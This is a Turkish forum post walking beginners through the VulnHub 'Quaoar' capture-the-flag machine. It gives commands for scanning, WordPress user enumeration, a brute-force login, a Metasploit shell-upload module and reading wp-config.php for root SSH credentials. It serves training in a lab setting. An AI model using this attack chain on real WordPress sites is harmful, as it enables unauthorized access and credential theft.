- 16 Mar 2017
- 3,246
- 92
Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;
Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.
Kod:
[URL="https://www.turkhackteam.org/capture-flag/1807884-mutlaka-okuyun-capture-flag-bolum-rehberi.html"]https://www.turkhackteam.org/capture-flag/1807884-mutlaka-okuyun-capture-flag-bolum-rehberi.html[/URL]
Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.
Kod:
[URL="https://www.vulnhub.com/entry/hackfest2016-quaoar,180/"]https://www.vulnhub.com/entry/hackfest2016-quaoar,180/[/URL]
Kod:
[COLOR="Red"][SIZE="3"][FONT="Comic Sans MS"][B]Hedef ; Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)
[/B][/FONT][/SIZE][/COLOR]
Şimdi İse Çözüme Geçelim.
İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.
Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.
Kod:
nmap -A -T4 192.168.1.13
Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.
Kod:
curl 192.168.1.13/robots.txt
Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .
Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;
Kullanacağım Komut ;
Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u
Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )
Kullandığım Wordlist İse ;
Username
Kod:
admin
wpuser
Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator
Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.
Kod:
admin:admin
(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-guvenlik/1739993-istediginiz-sitede-brute-force-saldirisi-burp-suite-ile-ram_hacker.html )
Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül
Kod:
use exploit/unix/webapp/wp_admin_shell_upload
Gerekli Bilgileri Girelim.
Kod:
set PASSWORD admin
set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run
Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.
İlk Bayrağımızı Yakalamış Olduk. Kodlar;
Kod:
cd /home
cd wpadmin
ls
cat flag.txt
Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli
Kod:
cd /
Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;
Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php
Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.
Kod:
root
rootpassword!
Bağlantıyı Kurup .
Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar
Kod:
ls
more flag.txt
Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular )
Son düzenleme: